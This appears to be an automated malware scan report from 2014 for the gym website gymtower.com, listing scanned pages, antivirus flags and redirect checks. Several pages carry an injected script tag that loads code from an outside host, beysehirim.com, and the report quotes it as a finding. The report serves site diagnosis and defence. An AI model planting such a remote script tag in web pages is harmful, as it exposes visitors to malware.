Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gymtower.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gymtower.com/ | 200 OK Content-Length: 1529 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464202"></script> | ||
http://gymtower.com/home.php | 200 OK Content-Length: 4307 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: text/javascript | clean |
http://gymtower.com/js/jquery.jscrollpane.min.js | 200 OK Content-Length: 20348 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b,a,c){b.fn.jScrollPane=function(f){function d(E,P){var aA,R=this,Z,al,w,an,U,aa,z,r,aB,aG,aw,j,J,i,k,ab,V,ar,Y,u,B,at,ag,ao,H,m,av,az,y,ax,aJ,g,M,ak=true,Q=true,aI=false,l=false,aq=E.clone(false,false).empty(),ad=b.fn.mwheelIntent?"mwheelIntent.jsp":"mousewheel.jsp";aJ=E.css("paddingTop") " " E.css("paddingRight") " " E.css("paddingBottom") " " E.css("paddingLeft");g=(parseInt(E.css("paddingLeft"),10)||0) (parseInt(E.css("paddingRight"),10)||0);function au(aS){var aN,aP,aO,aL,aK,aR,aQ Antivirus reports:
| ||
http://gymtower.com/js/jquery.mousewheel.js | 200 OK Content-Length: 7964 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var types = ['DOMMouseScroll', 'mousewheel']; $.event.special.mousewheel = { setup: function() { if ( this.addEventListener ) { for ( var i=types.length; i; ) { this.addEventListener( types[--i], handler, false ); } } else { this.onmousewheel = handler; } }, teardown: function() { if ( this.removeEventListener ) { Antivirus reports:
| ||
http://gymtower.com/js/jquery.nyroModal.custom.js | 200 OK Content-Length: 64072 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(function($, undefined) { var $w = $(window), $d = $(document), $b = $('body'), baseHref = $('base').attr('href'), _nmObj = { filters: [], callbacks: {}, loadFilter: undefined, modal: false, closeOnEscape: true, closeOnClick: true, useKeyHandler: false, showCloseButton: true, closeButton: '<a href="#" class="nyroModalClose nyroModalCloseButton nmReposition" title="close">Close</a>', stack: false, Antivirus reports:
| ||
http://gymtower.com/js/commonFunctions.js | 200 OK Content-Length: 6340 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ $('.scroll-pane').jScrollPane({ horizontalGutter: 30 }); $('a.actividades').nyroModal({ callbacks: { afterShowCont: function(){ $('#actividades-cont .scroll-pane').jScrollPane({ horizontalGutter: 30 }); $("ul").each(function(){ $(this).children("li:last").addClass("last"); }); } } }); $("#nav li" Antivirus reports:
| ||
http://gymtower.com/index.php | 200 OK Content-Length: 1529 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464202"></script> | ||
http://gymtower.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://gymtower.com/empresa.php | 200 OK Content-Length: 5141 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/serv-personalizado.php | 200 OK Content-Length: 6169 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/serv-empresas.php | 200 OK Content-Length: 6986 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/serv-tower.php | 200 OK Content-Length: 4993 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/contacto.php | 200 OK Content-Length: 6223 Content-Type: text/html | clean |
http://gymtower.com/js/validacion.js | 200 OK Content-Length: 7916 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Validacion={ form:null, patronMail:/^[_a-zA-Z0-9-] (\.[_a-zA-Z0-9-] )*@[a-z0-9-] (\.[a-z0-9-] )*(\.[a-z]{2,3})$/, inicio:function(){ this.form=document.getElementById('contactForm'); }, validarForm:function(){ var campos=new Array(); campos[0]='nombre'; campos[1]='empresa'; campos[2]='pais'; campos[3]='email'; campos[4]='mensaje'; var idCampo=null; var error=false; var regExpr=false; for(i=0;i<campos. Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gymtower.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 May 2014 21:56:01 GMT
Via: 1.1 varnish
Age: 0
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie2: WS_Tracker=e2533188.4fa2c697769e9; path=/
X-Cache: MISS
X-Varnish: 2068534305
GET / HTTP/1.1
Host: gymtower.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 May 2014 21:56:01 GMT
Via: 1.1 varnish
Age: 0
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie2: WS_Tracker=e2533188.4fa2c697769e9; path=/
X-Cache: MISS
X-Varnish: 2068534305
Second query (visit from search engine):
GET / HTTP/1.1
Host: gymtower.com
Referer: http://www.google.com/search?q=gymtower.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gymtower.com
Referer: http://www.google.com/search?q=gymtower.com
Result:
The result is similar to the first query. There are no suspicious redirects found.